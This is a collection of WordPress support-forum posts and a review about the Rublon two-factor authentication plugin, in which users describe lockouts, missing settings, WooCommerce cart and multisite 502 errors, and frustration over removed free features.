Trial account. 2FA is not triggered when I log in and this is the error I see on my WP dashboard. In addition, the 2FA toggles for all users are grayed out so I cannot enable any users. I suspect part of the problem may be that I don’t have everything configured correctly on the Rublon admin console, but I wouldn’t know because I cannot find any documentation that details that side of the setup.
I couldn’t find any avenue of support on your web site other than the fake chat box that appeared to show a live agent standing by, but apparently not really.
Any assistance appreciated…I’m planning on a paid account if I can get this working.

I have a question about the OTP SMS 2 factor authentication for paid Rublon subscriptions. I have many subscriber wordpress users that are not permitted to view the admin area of wordpress. I have mobile numbers stored for these specific users in a meta field called “mobile_number” associated with their user. Can I key in on that field for Rublon to use as their mobile number?

I’ve been using another plugin to ‘clone’ my site today. I wanted to make a clone of it so I could make some alterations/improvement.
I copied the cloned version to a subdomain. Now Rublon WILL NOT let me in. I’ve tried many times … I’ve waited … tried again and again … it gives me this message:

Since many hack attacks rely on holes and vulnerabilities of plugins, using outdated plugins could be a a big risk for getting your site hacked.

Honestly, this is a brutal situation. I’m going to uninstall Rublon should I ever get back into the website.
I am so upset about this. I received your email where you suggest the system isn’t perfect and relies too much on cookies. Well, I have another suggestion – maybe your system gets confused by VPN use too. I was running a VPN when this latest lock out happened.
I tried using the reset password option and Rublon still locks me out. Absolutely ridiculous.
You have some very serious flaws in your software.

After activating the plugin there are no settings tabs showing up. The Rublon icon is showing in the left menu bar in WordPress but the tab settings is not there. When I try to login with Chrome or Opera with email authentication, I get the following message:

You can close this tab and go back to the previous website.
However if I go back, I get to the login screen again and not be able to login.
In Firefox it seems to be working fine though.

I have installed Rublon plugin on multiple websites and they all seem to have the same issue. When I click on “Empty bin” button on any post type page (page, post or custom), a loading screen appears with with an iframe pop up. There is no way to close the pop up, I have to reload the page to remove it.

I’m reporting this plugin as broken. The developer made it a total piece of junk by removing every single free feature to force people who have already install the plugin to pay to get the same features they had before.
If users don’t upgrade, there are constant error messages and authentication problems.
Do not install this plugin.

]]>I realize from another support thread that WooCommerce compatibility is a work in progress, and I really like this plugin on one of my other (non-WooCommerce) WordPress sites.
I am working on a WooCommerce test site and I have been installing plugins one at a time and testing the store’s operation between installations. I activated Rublon just now and it causes customers’ carts to empty upon logging in at checkout. I had Rublon disabled for the Customer role and I also disabled the real-time logout feature, but the cart still empties on login.
I’ve already deactivated and deleted Rublon from the test WooCommerce installation, but I just wanted to let you know about this issue so you can look into it as you work to make Rublon 100% compatible with WooCommerce.

I’m running into a problem with the authentication on a WordPress multisite.
The site uses:
– WordPress 4.2.3 (only just, was the same on 4.2.2)
– Rublon 3.0.7
– Wordfence
– Jetpack protect
– Cloudflare
On server:
– Ubuntu 14.04.2. LTS
– Apache & Nginx (reverse proxy)
1st account, network admin, Chrome browser:
– On the main site all goes well with the superadmin account.
– The device en browser are in the Trusted Device Manager.
– When I try to login on a subsite, however, I get an Error 502 “bad gateway” from Cloudflare.
– When I retry for a live version the site is back, but I’m logged out.
2nd account, site admin, Firefox browser:
– I logged in with a different account. On the main site this account is a subscriber and 2-step verification is deactivated for subscribers.
– Moving to a site where this user is admin, I got a 502 error, the user got logged out, but it worked well on the 2nd attempt. On that site, with this user, all goes well since.
– When trying to access a 3rd site however, I also get the 502 error and retrying doesn’t help.
– I notice that there are no Trusted Devices on the site where I experience no (or few) problems with this account.
3rd account, site admin, Chrome browser:
I asked a friend to activate Rublon on his site on the same multisite. He did not run into any problem.
test: deactivate WordFence
I tried to deactivate Wordfence since I noticed that there used to be an issue with iThemes security. The result is that I do not always get a 502 error, but I still do not manage to login. Instead I get redirected to the homepage, which is also what happens when retrying for a live version.
test: pause Cloudflare
Makes no difference. Even the 502 error is still a CF screen.
Conclusion:
It seems to me that I only get one site going per user.
Any and all suggestions are welcome. TY!
]]>Hi, I can’t get it to work on my setup. Not sure if it’s something I have in a mu-plugin or in htaccess, or even a plugin. Have tried deleting things in mu plugin file but no changes.
It goes through the motions, configuring API credentials, then I get a warning saying information will be sent over an insure connection and can be read by a third party, are you sure you want to send information (using Firefox) – I click continue – but I never receive an email.
I must have tried at least 10 different times – but with no success. Also there are no menu options in WP admin – just Rublon – no settings etc…
I’ve been trying this with every plugin activated to see if it works.
The only success I’ve had is with a completely fresh install of wordpress.
If I clone a site and give you SFTP access will you be able to take a look to see what might be causing this.
I’d really like to be able to use this on client sites if I can get it to work.
